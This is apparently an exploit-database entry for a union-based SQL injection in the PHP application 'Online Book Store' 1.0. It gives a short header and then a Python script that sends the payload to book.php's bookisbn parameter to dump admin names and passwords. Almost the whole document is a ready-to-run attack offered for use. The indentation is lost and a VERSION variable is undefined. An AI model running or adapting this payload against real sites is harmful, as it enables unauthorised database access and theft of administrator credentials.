# Exploit Title: Online Book Store Union Based Sql Injection
# Date: 2020-10-25
# Exploit Author: ferhatcil
# Vendor Homepage: https://projectworlds.in/
# Software Link:
https://www.sourcecodester.com/php/14550/online-book-store-php-full-source-code.html
# Version: 1.0
# Tested on: Ubuntu 18.04
# CVE : N/A

Exploit Code

import getopt
import json
import sys
import requests
import colorama
from colorama import Fore, Style
from bs4 import BeautifulSoup

def usage():
print("Online Book Store SQLi {} ( github.com/ferhatcil )".format(VERSION))
print("Usage: " + sys.argv[0] + " [OPTIONS]")
print(" --domain\texample.com")
print("Examples:")
print(" python3 " + sys.argv[0] + " --domain http://example.com")
print(" python3 " + sys.argv[0] + " --domain http://example.com/bookstore")
sys.exit(1)


def xx(domain):
if 'http://' not in domain:
domain = "http://"+domain+"/book.php?bookisbn=-x' union select
1,2,3,4,group_concat(name,':',pass),6,7 from admin -- -"
else:
domain = domain+"/book.php?bookisbn=-x' union select
1,2,3,4,group_concat(name,':',pass),6,7 from admin -- -"
try:
r = requests.get(domain)
soup = BeautifulSoup(r.text,'html.parser')
data = soup.find('div',{'class':'col-md-6'}).find("p").text
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{Fore.YELLOW}"+ data + f"{
Style.RESET_ALL}")
except:
print(f"{Fore.RED}"+ "[-] Error" + f"{Style.RESET_ALL}")

if __name__ == "__main__":
try:
opts, args = getopt.getopt(sys.argv[1:], "d", ["domain="])
except(getopt.GetoptError) as err:
print(err)
sys.exit(-1)

for o, a in opts:
if o in ("-d", "--domain"):
xx(a)
elif o in ("-h", "--help"):
usage()
sys.exit()
else:
assert False, "unhandled option"
sys.exit(-1)

argc = len(sys.argv)
if argc < 2:
usage()